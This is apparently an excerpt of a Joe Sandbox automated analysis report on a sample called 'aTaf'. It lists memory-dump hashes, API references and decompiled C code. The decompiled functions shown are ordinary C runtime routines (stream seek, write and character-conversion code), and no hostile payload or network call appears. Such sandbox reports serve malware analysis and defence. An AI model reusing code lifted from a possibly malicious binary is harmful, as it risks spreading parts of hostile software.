                              • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                              • Instruction ID: 13c01fea6e247106def553ad4bd6de0e1ad7105865db91c0b359b0514de1b183
                              • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                              • Instruction Fuzzy Hash: D541E338845AA98EFF348E25889D3F8BFB1BB01351F1405CAC6A966191C7754EC7CF49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __calloc_crt
                              • String ID: P$B$`$B
                              • API String ID: 3494438863-235554963
                              • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                              • Instruction ID: c7311ca627173f9174803cca6d3939f1e2586de57efa71bc9a1d7673eee42148
                              • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                              • Instruction Fuzzy Hash: 02110A323086155BF7348F1CBC55B692B91FBC47247644636E611CB6E4E770DC834758
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E00413610() {
                              				signed long long _v12;
                              				signed int _v20;
                              				signed long long _v28;
                              				signed char _t8;
                              
                              				_t8 = GetModuleHandleA("KERNEL32");
                              				if(_t8 == 0) {
                              					L6:
                              					_v20 =  *0x41fb50;
                              					_v28 =  *0x41fb48;
                              					asm("fsubr qword [ebp-0x18]");
                              					_v12 = _v28 / _v20 * _v20;
                              					asm("fld1");
                              					asm("fcomp qword [ebp-0x8]");
                              					asm("fnstsw ax");
                              					if((_t8 & 0x00000005) != 0) {
                              						return 0;
                              					} else {
                              						return 1;
                              					}
                              				} else {
                              					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                              					if(__eax == 0) {
                              						goto L6;
                              					} else {
                              						_push(0);
                              						return __eax;
                              					}
                              				}
                              			}








                              APIs
                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: IsProcessorFeaturePresent$KERNEL32
                              • API String ID: 1646373207-3105848591
                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                              				void* __ebx;
                              				void* __ebp;
                              				signed int _t12;
                              				void* _t21;
                              				int _t25;
                              				void* _t30;
                              				int _t32;
                              				char* _t35;
                              
                              				_t21 = __edx;
                              				_t35 = _a4;
                              				_t17 = __ecx;
                              				if(_t35 != 0) {
                              					_t25 = lstrlenA(_t35) + 1;
                              					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                              					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                              					asm("sbb esi, esi");
                              					_t30 =  ~_t12 + 1;
                              					if(_t30 != 0) {
                              						_t12 = GetLastError();
                              						if(_t12 == 0x7a) {
                              							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                              							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                              							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                              							asm("sbb esi, esi");
                              							_t30 =  ~_t12 + 1;
                              						}
                              						if(_t30 != 0) {
                              							_t12 = E00401030();
                              						}
                              					}
                              					return _t12;
                              				} else {
                              					 *__ecx = _t35;
                              					return __eax;
                              				}
                              			}












                              APIs
                              • lstrlenA.KERNEL32(?), ref: 00401906
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                              • GetLastError.KERNEL32 ref: 00401940
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                              • String ID:
                              • API String ID: 3322701435-0
                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?), ref: 00501B6D
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 00501B96
                              • GetLastError.KERNEL32 ref: 00501BA7
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00501BBF
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00501BE7
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                              • String ID:
                              • API String ID: 3322701435-0
                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction ID: e82868bea4cd430e3b28be350d4ee3ac29f4f7d3e9dbeb1fdf3af2a89dcd770e
                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                              • Instruction Fuzzy Hash: D511C4312007547BD3309755CC89F6B7F6CEBC6BA9F008118FD459A281D721AC04C6B9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E0040C748(void* __edx, void* __esi, char _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				signed int _t70;
                              				signed int _t71;
                              				intOrPtr _t73;
                              				signed int _t75;
                              				signed int _t81;
                              				char _t82;
                              				signed int _t84;
                              				intOrPtr* _t86;
                              				signed int _t87;
                              				intOrPtr* _t90;
                              				signed int _t92;
                              				signed int _t94;
                              				void* _t96;
                              				signed char _t98;
                              				signed int _t99;
                              				intOrPtr _t102;
                              				signed int _t103;
                              				intOrPtr* _t104;
                              				signed int _t111;
                              				signed int _t114;
                              				intOrPtr _t115;
                              
                              				_t105 = __esi;
                              				_t97 = __edx;
                              				_t104 = _a4;
                              				_t87 = 0;
                              				_t121 = _t104;
                              				if(_t104 != 0) {
                              					_t70 = E0040FA20(__edx, _t104, _t104);
                              					__eflags =  *(_t104 + 4);
                              					_v8 = _t70;
                              					if(__eflags < 0) {
                              						 *(_t104 + 4) = 0;
                              					}
                              					_push(1);
                              					_push(_t87);
                              					_push(_t70);
                              					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                              					__eflags = _t71 - _t87;
                              					_v12 = _t71;
                              					if(_t71 < _t87) {
                              						L2:
                              						return _t71 | 0xffffffff;
                              					} else {
                              						_t98 =  *(_t104 + 0xc);
                              						__eflags = _t98 & 0x00000108;
                              						if((_t98 & 0x00000108) != 0) {
                              							_t73 =  *_t104;
                              							_t92 =  *(_t104 + 8);
                              							_push(_t105);
                              							_v16 = _t73 - _t92;
                              							__eflags = _t98 & 0x00000003;
                              							if((_t98 & 0x00000003) == 0) {
                              								__eflags = _t98;
                              								if(__eflags < 0) {
                              									L15:
                              									__eflags = _v12 - _t87;
                              									if(_v12 != _t87) {
                              										__eflags =  *(_t104 + 0xc) & 0x00000001;
                              										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                              											L40:
                              											_t75 = _v16 + _v12;
                              											__eflags = _t75;
                              											L41:
                              											return _t75;
                              										}
                              										_t99 =  *(_t104 + 4);
                              										__eflags = _t99 - _t87;
                              										if(_t99 != _t87) {
                              											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                              											_a4 = _t73 - _t92 + _t99;
                              											_t111 = (_v8 & 0x0000001f) << 6;
                              											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                              											if(__eflags == 0) {
                              												L39:
                              												_t66 =  &_v12;
                              												 *_t66 = _v12 - _a4;
                              												__eflags =  *_t66;
                              												goto L40;
                              											}
                              											_push(2);
                              											_push(0);
                              											_push(_v8);
                              											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                              											if(__eflags != 0) {
                              												_push(0);
                              												_push(_v12);
                              												_push(_v8);
                              												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                              												__eflags = _t81;
                              												if(_t81 >= 0) {
                              													_t82 = 0x200;
                              													__eflags = _a4 - 0x200;
                              													if(_a4 > 0x200) {
                              														L35:
                              														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                              														L36:
                              														_a4 = _t82;
                              														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                              														L37:
                              														if(__eflags != 0) {
                              															_t63 =  &_a4;
                              															 *_t63 = _a4 + 1;
                              															__eflags =  *_t63;
                              														}
                              														goto L39;
                              													}
                              													_t94 =  *(_t104 + 0xc);
                              													__eflags = _t94 & 0x00000008;
                              													if((_t94 & 0x00000008) == 0) {
                              														goto L35;
                              													}
                              													__eflags = _t94 & 0x00000400;
                              													if((_t94 & 0x00000400) == 0) {
                              														goto L36;
                              													}
                              													goto L35;
                              												}
                              												L31:
                              												_t75 = _t81 | 0xffffffff;
                              												goto L41;
                              											}
                              											_t84 =  *(_t104 + 8);
                              											_t96 = _a4 + _t84;
                              											while(1) {
                              												__eflags = _t84 - _t96;
                              												if(_t84 >= _t96) {
                              													break;
                              												}
                              												__eflags =  *_t84 - 0xa;
                              												if( *_t84 == 0xa) {
                              													_t44 =  &_a4;
                              													 *_t44 = _a4 + 1;
                              													__eflags =  *_t44;
                              												}
                              												_t84 = _t84 + 1;
                              												__eflags = _t84;
                              											}
                              											__eflags =  *(_t104 + 0xc) & 0x00002000;
                              											goto L37;
                              										}
                              										_v16 = _t87;
                              										goto L40;
                              									}
                              									_t75 = _v16;
                              									goto L41;
                              								}
                              								_t81 = E0040BFC1(__eflags);
                              								 *_t81 = 0x16;
                              								goto L31;
                              							}
                              							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                              							_t114 = (_v8 & 0x0000001f) << 6;
                              							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                              							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                              								goto L15;
                              							}
                              							_t103 = _t92;
                              							__eflags = _t103 - _t73;
                              							if(_t103 >= _t73) {
                              								goto L15;
                              							}
                              							_t115 = _t73;
                              							do {
                              								__eflags =  *_t103 - 0xa;
                              								if( *_t103 == 0xa) {
                              									_v16 = _v16 + 1;
                              									_t87 = 0;
                              									__eflags = 0;
                              								}
                              								_t103 = _t103 + 1;
                              								__eflags = _t103 - _t115;
                              							} while (_t103 < _t115);
                              							goto L15;
                              						}
                              						return _t71 -  *(_t104 + 4);
                              					}
                              				}
                              				_t86 = E0040BFC1(_t121);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				 *_t86 = 0x16;
                              				_t71 = E0040E744(__edx, _t104, __esi);
                              				goto L2;
                              			}

                              APIs
                              • __fileno.LIBCMT ref: 0040C77C
                              • __locking.LIBCMT ref: 0040C791
                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                              • String ID:
                              • API String ID: 2395185920-0
                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __fileno.LIBCMT ref: 0050C9E3
                              • __locking.LIBCMT ref: 0050C9F8
                                • Part of subcall function 0050C228: __getptd_noexit.LIBCMT ref: 0050C228
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno__getptd_noexit__locking
                              • String ID:
                              • API String ID: 630670418-0
                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction ID: 994b0f7bbbce94506ecccf93c34d00996691ae0a6f0c9716c8b40635893e7a79
                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                              • Instruction Fuzzy Hash: 5751B071E04209ABDB10CF68C886B6DBFB1FF46354F6483A9D915A72C1D730AE81DB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                              				void* __edi;
                              				void* __esi;
                              				signed int _t30;
                              				signed int _t31;
                              				signed int _t32;
                              				signed int _t33;
                              				signed int _t35;
                              				signed int _t39;
                              				void* _t42;
                              				intOrPtr _t43;
                              				void* _t45;
                              				signed int _t48;
                              				signed int* _t53;
                              				void* _t54;
                              				void* _t55;
                              				void* _t57;
                              
                              				_t54 = __ebp;
                              				_t45 = __edx;
                              				_t42 = __ebx;
                              				_t53 = _a4;
                              				if(_t53 == 0) {
                              					L40:
                              					_t31 = _t30 | 0xffffffff;
                              					__eflags = _t31;
                              					return _t31;
                              				} else {
                              					_t43 = _a12;
                              					if(_t43 == 2) {
                              						goto L40;
                              					} else {
                              						_t30 = _t53[0xe];
                              						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                              							goto L40;
                              						} else {
                              							_t48 = _a8;
                              							if(_t53[0x17] != 0x77) {
                              								__eflags = _t43 - 1;
                              								if(_t43 == 1) {
                              									_t48 = _t48 + _t53[0x1a];
                              									__eflags = _t48;
                              								}
                              								__eflags = _t48;
                              								if(_t48 < 0) {
                              									goto L39;
                              								} else {
                              									__eflags = _t53[0x16];
                              									if(__eflags == 0) {
                              										_t33 = _t53[0x1a];
                              										__eflags = _t48 - _t33;
                              										if(_t48 < _t33) {
                              											_t30 = E004054F0(_t42, _t54, _t53);
                              											_t55 = _t55 + 4;
                              											__eflags = _t30;
                              											if(_t30 < 0) {
                              												goto L39;
                              											} else {
                              												goto L27;
                              											}
                              										} else {
                              											_t48 = _t48 - _t33;
                              											L27:
                              											__eflags = _t48;
                              											if(_t48 == 0) {
                              												L38:
                              												return _t53[0x1a];
                              											} else {
                              												__eflags = _t53[0x12];
                              												if(_t53[0x12] != 0) {
                              													L30:
                              													__eflags = _t53[0x1b] - 0xffffffff;
                              													if(_t53[0x1b] != 0xffffffff) {
                              														_t53[0x1a] = _t53[0x1a] + 1;
                              														_t48 = _t48 - 1;
                              														__eflags = _t53[0x1c];
                              														_t53[0x1b] = 0xffffffff;
                              														if(_t53[0x1c] != 0) {
                              															_t53[0xe] = 1;
                              														}
                              													}
                              													__eflags = _t48;
                              													if(_t48 <= 0) {
                              														goto L38;
                              													} else {
                              														while(1) {
                              															_t35 = 0x4000;
                              															__eflags = _t48 - 0x4000;
                              															if(_t48 < 0x4000) {
                              																_t35 = _t48;
                              															}
                              															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                              															_t55 = _t55 + 0xc;
                              															__eflags = _t30;
                              															if(_t30 <= 0) {
                              																goto L39;
                              															}
                              															_t48 = _t48 - _t30;
                              															__eflags = _t48;
                              															if(_t48 > 0) {
                              																continue;
                              															} else {
                              																goto L38;
                              															}
                              															goto L41;
                              														}
                              														goto L39;
                              													}
                              												} else {
                              													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                              													_t55 = _t55 + 4;
                              													_t53[0x12] = _t30;
                              													__eflags = _t30;
                              													if(_t30 == 0) {
                              														goto L39;
                              													} else {
                              														goto L30;
                              													}
                              												}
                              											}
                              										}
                              									} else {
                              										_push(0);
                              										_push(_t48);
                              										_push(_t53[0x10]);
                              										_t53[0x1b] = 0xffffffff;
                              										_t53[1] = 0;
                              										 *_t53 = _t53[0x11];
                              										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                              										__eflags = _t30;
                              										if(_t30 < 0) {
                              											goto L39;
                              										} else {
                              											_t53[0x1a] = _t48;
                              											_t53[0x19] = _t48;
                              											return _t48;
                              										}
                              									}
                              								}
                              							} else {
                              								if(_t43 == 0) {
                              									_t48 = _t48 - _t53[0x19];
                              								}
                              								if(_t48 < 0) {
                              									L39:
                              									_t32 = _t30 | 0xffffffff;
                              									__eflags = _t32;
                              									return _t32;
                              								} else {
                              									if(_t53[0x11] != 0) {
                              										L11:
                              										if(_t48 <= 0) {
                              											L17:
                              											return _t53[0x19];
                              										} else {
                              											while(1) {
                              												_t39 = 0x4000;
                              												if(_t48 < 0x4000) {
                              													_t39 = _t48;
                              												}
                              												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                              												_t55 = _t55 + 0xc;
                              												if(_t30 == 0) {
                              													goto L39;
                              												}
                              												_t48 = _t48 - _t30;
                              												if(_t48 > 0) {
                              													continue;
                              												} else {
                              													goto L17;
                              												}
                              												goto L41;
                              											}
                              											goto L39;
                              										}
                              									} else {
                              										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                              										_t57 = _t55 + 4;
                              										_t53[0x11] = _t30;
                              										if(_t30 == 0) {
                              											goto L39;
                              										} else {
                              											E0040BA30(_t48, _t30, 0, 0x4000);
                              											_t55 = _t57 + 0xc;
                              											goto L11;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				L41:
                              			}




















                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _fseek_malloc_memset
                              • String ID:
                              • API String ID: 208892515-0
                              • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                              • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t59;
                              				intOrPtr* _t61;
                              				signed int _t63;
                              				void* _t68;
                              				signed int _t69;
                              				signed int _t72;
                              				signed int _t74;
                              				signed int _t75;
                              				signed int _t77;
                              				signed int _t78;
                              				signed int _t81;
                              				signed int _t82;
                              				signed int _t84;
                              				signed int _t88;
                              				signed int _t97;
                              				signed int _t98;
                              				signed int _t99;
                              				intOrPtr* _t100;
                              				void* _t101;
                              
                              				_t90 = __edx;
                              				if(_a8 == 0 || _a12 == 0) {
                              					L4:
                              					return 0;
                              				} else {
                              					_t100 = _a16;
                              					_t105 = _t100;
                              					if(_t100 != 0) {
                              						_t82 = _a4;
                              						__eflags = _t82;
                              						if(__eflags == 0) {
                              							goto L3;
                              						}
                              						_t63 = _t59 | 0xffffffff;
                              						_t90 = _t63 % _a8;
                              						__eflags = _a12 - _t63 / _a8;
                              						if(__eflags > 0) {
                              							goto L3;
                              						}
                              						_t97 = _a8 * _a12;
                              						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                              						_v8 = _t82;
                              						_v16 = _t97;
                              						_t81 = _t97;
                              						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                              							_v12 = 0x1000;
                              						} else {
                              							_v12 =  *(_t100 + 0x18);
                              						}
                              						__eflags = _t97;
                              						if(_t97 == 0) {
                              							L32:
                              							return _a12;
                              						} else {
                              							do {
                              								_t84 =  *(_t100 + 0xc) & 0x00000108;
                              								__eflags = _t84;
                              								if(_t84 == 0) {
                              									L18:
                              									__eflags = _t81 - _v12;
                              									if(_t81 < _v12) {
                              										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                              										__eflags = _t68 - 0xffffffff;
                              										if(_t68 == 0xffffffff) {
                              											L34:
                              											_t69 = _t97;
                              											L35:
                              											return (_t69 - _t81) / _a8;
                              										}
                              										_v8 = _v8 + 1;
                              										_t72 =  *(_t100 + 0x18);
                              										_t81 = _t81 - 1;
                              										_v12 = _t72;
                              										__eflags = _t72;
                              										if(_t72 <= 0) {
                              											_v12 = 1;
                              										}
                              										goto L31;
                              									}
                              									__eflags = _t84;
                              									if(_t84 == 0) {
                              										L21:
                              										__eflags = _v12;
                              										_t98 = _t81;
                              										if(_v12 != 0) {
                              											_t75 = _t81;
                              											_t90 = _t75 % _v12;
                              											_t98 = _t98 - _t75 % _v12;
                              											__eflags = _t98;
                              										}
                              										_push(_t98);
                              										_push(_v8);
                              										_push(E0040FA20(_t90, _t98, _t100));
                              										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                              										_t101 = _t101 + 0xc;
                              										__eflags = _t74 - 0xffffffff;
                              										if(_t74 == 0xffffffff) {
                              											L36:
                              											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                              											_t69 = _v16;
                              											goto L35;
                              										} else {
                              											_t88 = _t98;
                              											__eflags = _t74 - _t98;
                              											if(_t74 <= _t98) {
                              												_t88 = _t74;
                              											}
                              											_v8 = _v8 + _t88;
                              											_t81 = _t81 - _t88;
                              											__eflags = _t74 - _t98;
                              											if(_t74 < _t98) {
                              												goto L36;
                              											} else {
                              												L27:
                              												_t97 = _v16;
                              												goto L31;
                              											}
                              										}
                              									}
                              									_t77 = E0040C1FB(_t100);
                              									__eflags = _t77;
                              									if(_t77 != 0) {
                              										goto L34;
                              									}
                              									goto L21;
                              								}
                              								_t78 =  *(_t100 + 4);
                              								__eflags = _t78;
                              								if(__eflags == 0) {
                              									goto L18;
                              								}
                              								if(__eflags < 0) {
                              									_t48 = _t100 + 0xc;
                              									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                              									__eflags =  *_t48;
                              									goto L34;
                              								}
                              								_t99 = _t81;
                              								__eflags = _t81 - _t78;
                              								if(_t81 >= _t78) {
                              									_t99 = _t78;
                              								}
                              								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                              								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                              								 *_t100 =  *_t100 + _t99;
                              								_t101 = _t101 + 0xc;
                              								_t81 = _t81 - _t99;
                              								_v8 = _v8 + _t99;
                              								goto L27;
                              								L31:
                              								__eflags = _t81;
                              							} while (_t81 != 0);
                              							goto L32;
                              						}
                              					}
                              					L3:
                              					_t61 = E0040BFC1(_t105);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					 *_t61 = 0x16;
                              					E0040E744(_t90, 0, _t100);
                              					goto L4;
                              				}
                              			}






























                              APIs
                              • __flush.LIBCMT ref: 0040BB6E
                              • __fileno.LIBCMT ref: 0040BB8E
                              • __locking.LIBCMT ref: 0040BB95
                              • __flsbuf.LIBCMT ref: 0040BBC0
                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                              • String ID:
                              • API String ID: 3240763771-0
                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                              • String ID:
                              • API String ID: 1291973410-0
                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction ID: 997f0f4a8cab561417d2b8887da52803a62540f98208416afc529c8b97f6cc72
                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                              • Instruction Fuzzy Hash: D6419632A00605EBEF249F69C8D56AEFFB5FF80720F288529E9559B1C0D770DE418B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: _fseek_malloc_memset
                              • String ID:
                              • API String ID: 208892515-0
                              • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction ID: 2739c68605b846c5a22944f3bc8ee9efda3b936539c0835c923c77a4735099fd
                              • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                              • Instruction Fuzzy Hash: 8B41E4B2640F124AD7308A2DA92C71F7AE5BFC0364F140A2DE5A6C67D0E771E865CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

